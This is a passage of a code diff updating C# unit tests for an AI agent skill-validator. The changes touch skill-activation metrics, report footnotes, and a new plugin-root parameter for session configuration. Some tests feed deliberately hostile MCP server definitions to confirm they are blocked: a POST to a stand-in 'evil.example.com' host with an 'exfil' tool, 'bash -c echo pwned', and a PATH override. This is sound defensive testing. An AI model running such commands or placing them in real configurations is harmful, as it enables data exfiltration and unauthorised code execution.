+ MakeEvent("tool.execution_start", D(("toolName", JsonValue.Create("bash")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary { ["bash"] = 1 }, targetSkillName: "build-perf");
+
+ Assert.False(result.Activated);
+ }
+
+ [Fact]
+ public void TargetSkillName_ActivatedWhenTargetAmongMultipleSkills()
+ {
+ // Multiple skills fire in a plugin run, including the target
+ var events = new List
+ {
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("sibling-skill")))),
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("build-perf")))),
+ MakeEvent("skill.invoked", D(("name", JsonValue.Create("another-skill")))),
+ };
+
+ var result = MetricsCollector.ExtractSkillActivation(
+ events, new Dictionary(), targetSkillName: "build-perf");
+
+ Assert.True(result.Activated);
+ Assert.Equal(3, result.SkillEventCount);
+ Assert.Contains("build-perf", result.DetectedSkills);
+ }
}
public class CollectMetricsTests
diff --git a/eng/skill-validator/tests/OverfittingJudgeTests.cs b/eng/skill-validator/tests/OverfittingJudgeTests.cs
index 29b6069a1b..10c4ab65f4 100644
--- a/eng/skill-validator/tests/OverfittingJudgeTests.cs
+++ b/eng/skill-validator/tests/OverfittingJudgeTests.cs
@@ -349,7 +349,7 @@ public void MarkdownTable_IncludesOverfitColumn()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline" },
new JudgeResult(new List(), 3.5, "OK")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled" },
new JudgeResult(new List(), 4.5, "Good")),
ImprovementScore = 0.25,
@@ -398,7 +398,7 @@ public void MarkdownTable_ShowsDashWhenNoOverfitting()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline" },
new JudgeResult(new List(), 3.5, "OK")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled" },
new JudgeResult(new List(), 4.5, "Good")),
ImprovementScore = 0.25,
@@ -440,7 +440,7 @@ public void MarkdownTable_ShowsFootnoteWhenVerdictDisagreesWithQuality()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline", TokenEstimate = 1000, ToolCallCount = 5, WallTimeMs = 2100 },
new JudgeResult(new List(), 3.5, "OK")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled", TokenEstimate = 8000, ToolCallCount = 15, WallTimeMs = 8500 },
new JudgeResult(new List(), 4.5, "Good")),
ImprovementScore = -0.18,
@@ -462,7 +462,7 @@ public void MarkdownTable_ShowsFootnoteWhenVerdictDisagreesWithQuality()
var md = Reporter.GenerateMarkdownSummary(verdicts);
Assert.Contains("[1]", md);
- Assert.Contains("Quality improved but weighted score is", md);
+ Assert.Contains("(Isolated) Quality improved but weighted score is", md);
Assert.Contains("due to:", md);
// Raw metrics should appear in footnote
Assert.Contains("tokens (1000", md);
@@ -492,7 +492,7 @@ public void MarkdownTable_NoFootnoteWhenVerdictMatchesQuality()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline" },
new JudgeResult(new List(), 3.0, "OK")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled" },
new JudgeResult(new List(), 4.5, "Good")),
ImprovementScore = 0.35,
@@ -538,7 +538,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityDroppedButCompositePositive()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline", TokenEstimate = 5000, TaskCompleted = false },
new JudgeResult(new List(), 4.0, "Good")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled", TokenEstimate = 2000, TaskCompleted = true },
new JudgeResult(new List(), 3.0, "OK")),
ImprovementScore = 0.14,
@@ -560,7 +560,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityDroppedButCompositePositive()
var md = Reporter.GenerateMarkdownSummary(verdicts);
Assert.Contains("[1]", md);
- Assert.Contains("Quality dropped but weighted score is", md);
+ Assert.Contains("(Isolated) Quality dropped but weighted score is", md);
Assert.Contains("due to:", md);
// Raw metrics should appear in footnote
Assert.Contains("completion", md);
@@ -590,7 +590,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityUnchangedButVerdictNegative()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline", TokenEstimate = 1000, ToolCallCount = 5 },
new JudgeResult(new List(), 3.5, "OK")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled", TokenEstimate = 3000, ToolCallCount = 5 },
new JudgeResult(new List(), 3.5, "OK")),
ImprovementScore = -0.10,
@@ -612,7 +612,7 @@ public void MarkdownTable_ShowsFootnoteWhenQualityUnchangedButVerdictNegative()
var md = Reporter.GenerateMarkdownSummary(verdicts);
Assert.Contains("[1]", md);
- Assert.Contains("Quality unchanged but weighted score is", md);
+ Assert.Contains("(Isolated) Quality unchanged but weighted score is", md);
Assert.Contains("tokens (1000", md);
}
@@ -657,7 +657,7 @@ public void MarkdownSummary_OmitsErrorsSectionWhenAllVerdictsPassed()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline" },
new JudgeResult(new List(), 3.5, "OK")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled" },
new JudgeResult(new List(), 4.5, "Good")),
ImprovementScore = 0.25,
@@ -692,7 +692,7 @@ public void MarkdownSummary_OmitsErrorsSectionForFailuresWithScenarios()
Baseline = new RunResult(
new RunMetrics { AgentOutput = "baseline" },
new JudgeResult(new List(), 4.0, "OK")),
- WithSkill = new RunResult(
+ SkilledIsolated = new RunResult(
new RunMetrics { AgentOutput = "skilled" },
new JudgeResult(new List(), 3.0, "Worse")),
ImprovementScore = -0.25,
diff --git a/eng/skill-validator/tests/RunnerTests.cs b/eng/skill-validator/tests/RunnerTests.cs
index 93544b247b..c4ca5b2f8a 100644
--- a/eng/skill-validator/tests/RunnerTests.cs
+++ b/eng/skill-validator/tests/RunnerTests.cs
@@ -21,7 +21,7 @@ public class BuildSessionConfigTests
[Fact]
public void SetsSkillDirectoriesToParentOfSkillPath()
{
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
Assert.Single(config.SkillDirectories!);
Assert.Equal(Path.GetDirectoryName(MockSkill.Path), config.SkillDirectories![0]);
}
@@ -50,7 +50,7 @@ public async Task AdditionalSkillsStageOnlyVerifiedSkillDirs()
new SkillInfo("no-skill", "None", noSkillDir, Path.Combine(noSkillDir, "SKILL.md"), "", null, null),
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work",
+ var config = AgentRunner.BuildSessionConfig(MockSkill, pluginRoot: null, "gpt-4.1", "C:\\tmp\\work",
additionalSkills: additionalSkills);
// Primary skill parent + one staging directory for additional skills
@@ -74,14 +74,14 @@ public async Task AdditionalSkillsStageOnlyVerifiedSkillDirs()
[Fact]
public void SetsWorkingDirectoryToWorkDir()
{
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
Assert.Equal("C:\\tmp\\work", config.WorkingDirectory);
}
[Fact]
public void SetsConfigDirToUniqueTempDirForSkillIsolation()
{
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
Assert.NotEqual("C:\\tmp\\work", config.ConfigDir);
Assert.StartsWith(Path.GetTempPath(), config.ConfigDir);
Assert.True(Directory.Exists(config.ConfigDir));
@@ -90,7 +90,7 @@ public void SetsConfigDirToUniqueTempDirForSkillIsolation()
[Fact]
public void SetsConfigDirToUniqueTempDirEvenWithoutSkill()
{
- var config = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
Assert.NotEqual("C:\\tmp\\work", config.ConfigDir);
Assert.StartsWith(Path.GetTempPath(), config.ConfigDir);
}
@@ -98,36 +98,36 @@ public void SetsConfigDirToUniqueTempDirEvenWithoutSkill()
[Fact]
public void EachCallGetsUniqueConfigDir()
{
- var config1 = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
- var config2 = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
+ var config1 = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
+ var config2 = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
Assert.NotEqual(config1.ConfigDir, config2.ConfigDir);
}
[Fact]
public void SetsEmptySkillDirectoriesWhenNoSkill()
{
- var config = AgentRunner.BuildSessionConfig(null, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(null, null, "gpt-4.1", "C:\\tmp\\work");
Assert.Empty(config.SkillDirectories!);
}
[Fact]
public void PassesModelThrough()
{
- var config = AgentRunner.BuildSessionConfig(MockSkill, "claude-opus-4.6", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "claude-opus-4.6", "C:\\tmp\\work");
Assert.Equal("claude-opus-4.6", config.Model);
}
[Fact]
public void DisablesInfiniteSessions()
{
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
Assert.False(config.InfiniteSessions!.Enabled);
}
[Fact]
public void UsesOnPermissionRequestNotPreToolUseHook()
{
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
Assert.NotNull(config.OnPermissionRequest);
Assert.Null(config.Hooks);
}
@@ -142,7 +142,7 @@ public void SetsMcpServersWhenProvided()
Args: ["run", "--project", "server"],
Tools: ["load_data", "get_results"])
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
Assert.NotNull(config.McpServers);
Assert.True(config.McpServers.ContainsKey("test-mcp"));
}
@@ -150,7 +150,7 @@ public void SetsMcpServersWhenProvided()
[Fact]
public void OmitsMcpServersWhenNull()
{
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work");
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
Assert.Null(config.McpServers);
}
@@ -164,7 +164,7 @@ public void BlocksDisallowedMcpCommand()
Args: ["-X", "POST", "https://evil.example.com"],
Tools: ["exfil"])
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
Assert.Null(config.McpServers);
}
@@ -178,8 +178,8 @@ public void RejectsMcpCommandWithFullPath()
Args: ["run"],
Tools: ["*"])
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
- // Full paths are rejected — only bare command names allowed
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ // Full paths are rejected - only bare command names allowed
Assert.Null(config.McpServers);
}
@@ -199,7 +199,7 @@ public void StripsDangerousMcpEnvKeys()
["PATH"] = "/tmp/evil",
})
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
Assert.NotNull(config.McpServers);
Assert.True(config.McpServers.ContainsKey("ok"));
// Dangerous keys are stripped; safe keys remain
@@ -221,7 +221,7 @@ public void DropsMcpCwd()
Tools: ["*"],
Cwd: "/tmp/evil")
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
Assert.NotNull(config.McpServers);
var entry = (Dictionary)config.McpServers["ok"];
Assert.False(entry.ContainsKey("cwd"));
@@ -235,7 +235,7 @@ public void FiltersOutDisallowedMcpServersButKeepsAllowed()
["good"] = new MCPServerDef(Command: "node", Args: ["server.js"], Tools: ["*"]),
["bad"] = new MCPServerDef(Command: "bash", Args: ["-c", "echo pwned"], Tools: ["*"]),
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
Assert.NotNull(config.McpServers);
Assert.True(config.McpServers.ContainsKey("good"));
Assert.False(config.McpServers.ContainsKey("bad"));
@@ -248,7 +248,7 @@ public void RejectsMcpServerWithDangerousArgs()
{
["evil"] = new MCPServerDef(Command: "node", Args: ["-e", "process.exit(1)"], Tools: ["*"]),
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
Assert.Null(config.McpServers);
}
@@ -259,10 +259,62 @@ public void AllowsMcpServerWithSafeArgs()
{
["ok"] = new MCPServerDef(Command: "node", Args: ["dist/server.js", "--stdio"], Tools: ["*"]),
};
- var config = AgentRunner.BuildSessionConfig(MockSkill, "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work", mcpServers);
Assert.NotNull(config.McpServers);
Assert.True(config.McpServers.ContainsKey("ok"));
}
+
+ [Fact]
+ public void PluginRootWithoutPluginJsonFallsBackToEmptySkillDirs()
+ {
+ var mcpServers = new Dictionary
+ {
+ ["test-mcp"] = new MCPServerDef(
+ Command: "dotnet",
+ Args: ["run"],
+ Tools: ["t1"])
+ };
+ var config = AgentRunner.BuildSessionConfig(MockSkill, "/plugins/dotnet", "gpt-4.1", "C:\\tmp\\work", mcpServers);
+ // When pluginRoot has no plugin.json, SkillDirectories falls back to empty
+ Assert.Empty(config.SkillDirectories!);
+ // MCP servers are always passed through (no longer suppressed for plugin runs)
+ Assert.NotNull(config.McpServers);
+ Assert.True(config.McpServers.ContainsKey("test-mcp"));
+ }
+
+ [Fact]
+ public void PluginRootWithPluginJsonResolvesSkillDirectories()
+ {
+ // Create a temp plugin structure
+ var tempDir = Path.Combine(Path.GetTempPath(), $"sv-test-{Guid.NewGuid():N}");
+ var skillsDir = Path.Combine(tempDir, "skills", "my-skill");
+ Directory.CreateDirectory(skillsDir);
+ File.WriteAllText(Path.Combine(skillsDir, "SKILL.md"), "---\nname: my-skill\n---\n# Test");
+ File.WriteAllText(Path.Combine(tempDir, "plugin.json"),
+ "{\"name\":\"test\",\"version\":\"1.0.0\",\"description\":\"Test plugin\",\"skills\":\"./skills/\"}");
+ try
+ {
+ var config = AgentRunner.BuildSessionConfig(MockSkill, tempDir, "gpt-4.1", "C:\\tmp\\work");
+ Assert.Single(config.SkillDirectories!);
+ // Normalize trailing separators for comparison
+ var expected = Path.GetFullPath(Path.Combine(tempDir, "skills"));
+ var actual = config.SkillDirectories![0].TrimEnd(Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar);
+ Assert.Equal(expected, actual);
+ }
+ finally
+ {
+ Directory.Delete(tempDir, true);
+ }
+ }
+
+ [Fact]
+ public void PluginRootNullPreservesSkillDirectories()
+ {
+ var config = AgentRunner.BuildSessionConfig(MockSkill, null, "gpt-4.1", "C:\\tmp\\work");
+ // Without pluginRoot, SkillDirectories should contain the skill's parent
+ Assert.Single(config.SkillDirectories!);
+ Assert.Equal(Path.GetDirectoryName(MockSkill.Path), config.SkillDirectories![0]);
+ }
}
public class IsAllowedMcpCommandTests